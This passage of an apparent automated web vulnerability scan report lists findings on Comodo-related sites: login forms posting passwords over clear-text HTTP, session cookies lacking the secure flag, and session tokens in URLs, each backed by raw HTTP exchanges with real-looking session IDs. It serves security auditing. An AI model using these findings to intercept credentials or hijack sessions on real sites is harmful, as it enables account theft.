
password

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.13. http://www.vengine.com/products/vengine/first_time.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.14. http://www.vengine.com/products/vengine/help.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/help.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.15. http://www.vengine.com/products/vengine/index.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.16. http://www.vengine.com/products/vengine/options.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/options.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.17. http://www.vengine.com/products/vengine/requirements.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.18. http://www.vengine.com/products/vengine/setup.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/setup.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.19. http://www.vengine.com/products/vengine/ssl_feedback.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.20. http://www.vengine.com/products/vengine/uninstall.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.21. http://www.vengine.com/sitemap.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.22. http://www.vengine.com/support/faq.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/faq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.23. http://www.vengine.com/support/index.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vengine.com
Path:	/support/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://secure.comodo.com/products/!hostedLogin

The form contains the following password field:

password

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

3. SSL cookie without secure flag set previous next
There are 7 instances of this issue:

https://accounts.comodo.com/cfp/management/signup
https://accounts.comodo.com/cfp/management/terms
https://accounts.comodo.com/esm/management/signup
https://accounts.comodo.com/login
https://www.panopticsecurity.com/Comodo/index.jsp
https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion
https://www.panopticsecurity.com/PCICS/PanController/doInitUser

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

3.1. https://accounts.comodo.com/cfp/management/signup previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://accounts.comodo.com
Path:	/cfp/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:57 GMT
Server: Apache
ETag: "f6420706d003e74fc9d717cc1e190b50"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 48761
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.2. https://accounts.comodo.com/cfp/management/terms previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://accounts.comodo.com
Path:	/cfp/management/terms

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cfp/management/terms HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "3ecf7266c3a18f0a58b96482ba0e28e8"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 40640
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<pre>
END USER LICENSE AND SUBSCRIBER AGREEMENT
Comodo Internet Security

IMPORTANT ... PLEASE READ THESE TERMS CAREFULLY BEFORE DOWNLOADING, INS
...[SNIP]...

3.3. https://accounts.comodo.com/esm/management/signup previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://accounts.comodo.com
Path:	/esm/management/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esm/management/signup HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:04:01 GMT
Server: Apache
ETag: "b6b570bb3f1631ef9ea8a2a76928b0ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 66118
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

3.4. https://accounts.comodo.com/login previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://accounts.comodo.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: accounts.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:03:59 GMT
Server: Apache
ETag: "6ec6b2f81215f905c8a500b7a070476b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _comodo_sasp_session=01e1085565732cbc99b7e85823fa75c7; path=/; HttpOnly
Content-Length: 6189
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3.5. https://www.panopticsecurity.com/Comodo/index.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/Comodo/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Comodo/index.jsp?partner=Comodo HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://hackerguardian.com/hackerguardian/qa_sa_wizard.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.panopticsecurity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:23:21 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=c437c7a28b71ec890cf440a1d883; Path=/PCICS
Connection: close
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html
...[SNIP]...

3.6. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/PCICS/MerController/doMetaQuestion

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=c4b411f07d6c067b98ce9194a5ae; Path=/PCICS
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

3.7. https://www.panopticsecurity.com/PCICS/PanController/doInitUser previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.panopticsecurity.com
Path:	/PCICS/PanController/doInitUser

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c483ef1a943db8e1f27035ee8e5c

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 18 Sep 2011 11:28:59 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1 Java/Sun Microsystems Inc./1.6)
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Location: http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 224
Set-Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64; Path=/PCICS
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo">here</a>
...[SNIP]...

4. Session token in URL previous next
There are 7 instances of this issue:

http://efaxcorporate.com/
http://efaxcorporate.com/solutions/Compatibility/Industry-Compatibility
http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard
https://secure.comodo.com/ev/faq.html
https://secure.comodo.com/geekbuddy/create-account.php
http://server.iad.liveperson.net/hc/61298727/
http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-search.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://efaxcorporate.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://efaxcorporate.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

https://server.iad.liveperson.net/hc/62672927/x.js?SESSIONVAR!origin=efaxCorporatesales&cmd=file&file=chatScript3&site=62672927&imageUrl=https://a248.e.akamai.net/7/248/528/001/images.j2.com/chatEfaxCorp/

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
